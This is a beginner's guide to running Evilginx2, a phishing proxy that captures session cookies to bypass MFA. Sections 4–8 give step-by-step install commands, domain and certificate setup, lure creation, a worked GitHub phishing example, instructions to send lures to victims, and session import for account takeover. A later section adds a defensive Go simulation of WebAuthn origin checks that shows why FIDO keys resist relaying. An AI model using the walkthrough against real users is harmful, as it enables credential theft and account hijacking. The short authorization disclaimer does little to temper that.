# Evilginx2 Basics – Complete Beginner’s Guide

## 1. What Is Evilginx2?

Evilginx2 is a man-in-the-middle (MITM) phishing framework that proxies genuine
site traffic through a server you control. Unlike traditional phishing, it doesn’t
just steal credentials; it captures session cookies and tokens, enabling the
attacker to log in as the user—even if MFA is enabled.

---

## 2. Key Concepts & Architecture

1. **Proxy Engine**
   * Intercepts all HTTP(S) traffic between the victim and a target service.
   * Injects JavaScript hooks to capture tokens, cookies, and form data.
2. **Phishing Domain (“Lures”)**
   * You register custom domains (e.g. `login-phish.com`) and point them to your
     Evilginx2 server.
3. **Configuration “Phishlets”**
   * YAML-based modules defining how to proxy each target service (e.g. Google,
     Facebook).
   * Specify hostnames, paths to rewrite, JS callbacks for token capture, and
     session endpoints.
4. **Session Management**
   * Once tokens are captured, Evilginx2 packages them as a “session” you can later
     import into your browser to assume the victim’s identity.

---

## 3. Prerequisites

* **Linux server** with a public IP (e.g. a VPS).
* **Domain name(s)** you control (one per targeted service ideally).
* **Docker** (optional) or Go toolchain if building from source.
* **Let’s Encrypt** client (certbot) for TLS certificates.

---

## 4. Installation

You have two main options:

### A. Precompiled Binary

1. Download the latest release from GitHub:

   ```bash
   wget https://github.com/kgretzky/evilginx2/releases/download/v2.x.x/evilginx_linux_amd64
   chmod +x evilginx_linux_amd64
   mv evilginx_linux_amd64 /usr/local/bin/evilginx2
   ```
2. Install certbot:

   ```bash
   sudo apt update && sudo apt install certbot
   ```

### B. Build from Source

1. Install Go (≥1.16).
2. Clone & build:

```bash
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo cp bin/evilginx2 /usr/local/bin/
```

---

## 5. Initial Configuration

1. **DNS**
   * Create an A record pointing your phishing domain (e.g. `accounts.phish.com`)
     to your server’s IP.
2. **Start Evilginx2**

   ```bash
   sudo evilginx2
   ```
3. **Generate TLS Certificates** (in the Evilginx2 console):

   ```
   > config domain phish.com
   > config certbot phish.com
   > phishlets enable google # example for Google
   > lures create google
   ```

---

## 6. Managing Phishlets

* **List available:** `phishlets`
* **Enable a phishlet:**

  ```
  > phishlets enable github
  > phishlets set github domain gh-phish.com
  > phishlets update github
  ```
* **Disable:** `phishlets disable github`

Each phishlet folder (under `~/.evilginx2/phishlets/`) includes:

* `config.yml` — hostname mappings & routes
* `phish.js` — JavaScript hooks to extract tokens & cookies
* `capture.js` — post-login hook to save session data

---

## 7. Capturing Sessions

1. **Generate a “lure” URL:**

   ```
   > lures create google
   Lure URL: https://accounts.google.phish.com
   ```
2. **Send to victim.**
3. **Check sessions:**

   ```
   > sessions
   [0] [email protected] – Active
   ```
4. **Import session into your browser:**

   ```
   > sessions import 0
   ```

This will print a browser-bookmarklet or `curl` command that sets the exact
cookies in your browser.

---

## 8. Practical Example: Phishing GitHub

```bash
# In Evilginx2 console
> config domain gh-phish.com
> config certbot gh-phish.com
> phishlets enable github
> phishlets set github domain gh-phish.com
> phishlets update github
> lures create github
Lure URL → https://github.com.gh-phish.com/login
```

Send that login link; when the victim logs in, you’ll capture their OAuth tokens
and session cookies—then simply `sessions list` and `sessions import <ID>` to take
over.

---

## 9. Limitations & Defenses

* **Limitations**
  * Only works against web-based flows, not native apps.
  * Modern anti-phishing protections (browser flags, always-HTTPS policies) may
    block unknown domains.
* **Defenses**
  * Enforce strict “Expect-CT” and HTTP Public Key Pinning (HPKP).
  * Use FIDO-based phishing-resistant MFA (e.g. security keys).
  * Employee/user training to spot URL anomalies.
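
The FIDO item in the list above is the defence that actually breaks this class of attack, and the reason is worth seeing in code. The browser fills the `origin` field of WebAuthn's `clientDataJSON` with the origin it is really connected to, the RP ID is bound to the page's own domain, and the security key signs over both; a relying party that checks those fields rejects an assertion collected on a look-alike host, and the proxy cannot rewrite them because the signature covers them. One-time codes and push approvals carry no such binding, which is why the session-capture flow described earlier works against them. (The certificate-pinning headers in the same list, HPKP and Expect-CT, have since been removed from major browsers and in any case only constrain which certificate the browser accepts for the real site; a proxy on its own hostname presents its own valid certificate.) The Go program below is an added example written for this page, not code from the guide or from the Evilginx2 project (Go is chosen because Evilginx2 itself is written in Go). It simulates the browser and key with simplified WebAuthn structures, uses a constructed challenge and the lure hostname from the GitHub example, and runs a genuine login, a relayed login, and a relayed login whose origin and rpIdHash the proxy has rewritten through the same relying-party check.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"errors"
	"fmt"
)

// Sentinel errors so a caller can tell why the relying party (RP) refused an assertion.
var (
	ErrBadChallenge   = errors.New("wrong ceremony type or challenge")
	ErrOriginMismatch = errors.New("clientDataJSON origin is not the RP's origin")
	ErrRPIDMismatch   = errors.New("rpIdHash is not the hash of the RP ID")
	ErrBadSignature   = errors.New("signature does not match the presented data")
)

// clientData: the browser, not page JavaScript, fills Origin with the origin it really loaded.
type clientData struct {
	Type      string `json:"type"`
	Challenge string `json:"challenge"`
	Origin    string `json:"origin"`
}

// Assertion is a simplified navigator.credentials.get() result: AuthenticatorData is
// rpIdHash (32) || flags (1) || signCount (4); Signature covers both fields (see digest).
type Assertion struct{ AuthenticatorData, ClientDataJSON, Signature []byte }

// digest is SHA-256(authData || SHA-256(clientDataJSON)), the value the key actually signs.
func digest(authData, clientDataJSON []byte) []byte {
	cdHash := sha256.Sum256(clientDataJSON)
	d := sha256.Sum256(append(append([]byte{}, authData...), cdHash[:]...))
	return d[:]
}

// Authenticate simulates browser plus security key on a page served from origin; a browser
// only runs the ceremony for an RP ID that is a registrable suffix of the page's own host.
func Authenticate(priv *ecdsa.PrivateKey, rpID, origin, challenge string) Assertion {
	cd, _ := json.Marshal(clientData{Type: "webauthn.get", Challenge: challenge, Origin: origin})
	rpHash := sha256.Sum256([]byte(rpID))
	authData := append(rpHash[:], 0x01, 0, 0, 0, 1) // flags: user present; signCount = 1
	sig, err := ecdsa.SignASN1(rand.Reader, priv, digest(authData, cd))
	if err != nil {
		panic(err) // only fails if the random source does
	}
	return Assertion{AuthenticatorData: authData, ClientDataJSON: cd, Signature: sig}
}

// Verify is the RP's check: ceremony type and challenge, origin, RP ID hash, then signature.
func Verify(pub *ecdsa.PublicKey, rpID, origin, challenge string, a Assertion) error {
	var cd clientData
	if err := json.Unmarshal(a.ClientDataJSON, &cd); err != nil {
		return err
	}
	if cd.Type != "webauthn.get" || cd.Challenge != challenge {
		return ErrBadChallenge
	}
	if cd.Origin != origin {
		return fmt.Errorf("%w: got %q", ErrOriginMismatch, cd.Origin)
	}
	rpHash := sha256.Sum256([]byte(rpID))
	if len(a.AuthenticatorData) < 37 || !bytes.Equal(a.AuthenticatorData[:32], rpHash[:]) {
		return ErrRPIDMismatch
	}
	if !ecdsa.VerifyASN1(pub, digest(a.AuthenticatorData, a.ClientDataJSON), a.Signature) {
		return ErrBadSignature
	}
	return nil
}

// DemoResult: the RP's decision for a genuine, a relayed, and a relayed-then-rewritten login.
type DemoResult struct{ Legit, Relayed, Tampered error }

// Demo enrols one key for the real site and plays the three scenarios. The challenge is a
// constructed constant; a real RP issues fresh random bytes for every login.
func Demo() DemoResult {
	const rpID, origin, challenge = "github.com", "https://github.com", "constructed-challenge-1"
	const lureHost = "github.com.gh-phish.com" // the lure hostname used in this guide
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	pub, r := &priv.PublicKey, DemoResult{}
	// Genuine: the browser reports the real origin and uses the real RP ID.
	r.Legit = Verify(pub, rpID, origin, challenge, Authenticate(priv, rpID, origin, challenge))
	// Relayed: the proxy forwards the real challenge, but the browser records the look-alike
	// origin and can only use the look-alike host as RP ID, so the RP sees the mismatch.
	relayed := Authenticate(priv, lureHost, "https://"+lureHost, challenge)
	r.Relayed = Verify(pub, rpID, origin, challenge, relayed)
	// Tampered: the proxy rewrites origin and rpIdHash to the real values, but the signature
	// covers the original bytes, so it no longer verifies.
	realHash := sha256.Sum256([]byte(rpID))
	tampered := Assertion{
		AuthenticatorData: append(realHash[:], relayed.AuthenticatorData[32:]...),
		ClientDataJSON:    bytes.Replace(relayed.ClientDataJSON, []byte("https://"+lureHost), []byte(origin), 1),
		Signature:         relayed.Signature,
	}
	r.Tampered = Verify(pub, rpID, origin, challenge, tampered)
	return r
}
```

`Demo` returns `nil` for the genuine login, `ErrOriginMismatch` for the relayed one and `ErrBadSignature` for the rewritten one (it needs Go 1.15 or later for `ecdsa.SignASN1`). A real relying party adds the remaining WebAuthn checks (credential lookup, signCount, user-presence flag), but the origin and RP ID comparisons shown here are what make the factor phishing-resistant: the proxy can forward every byte of the login flow and still cannot produce an assertion the real site will accept.
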
---

## 10. Ethical & Legal Considerations

Evilginx2 is a powerful red-teaming tool—but using it without explicit
authorization is illegal. Always obtain written consent before simulating phishing
or issuing “lures” against any domain you do not own.
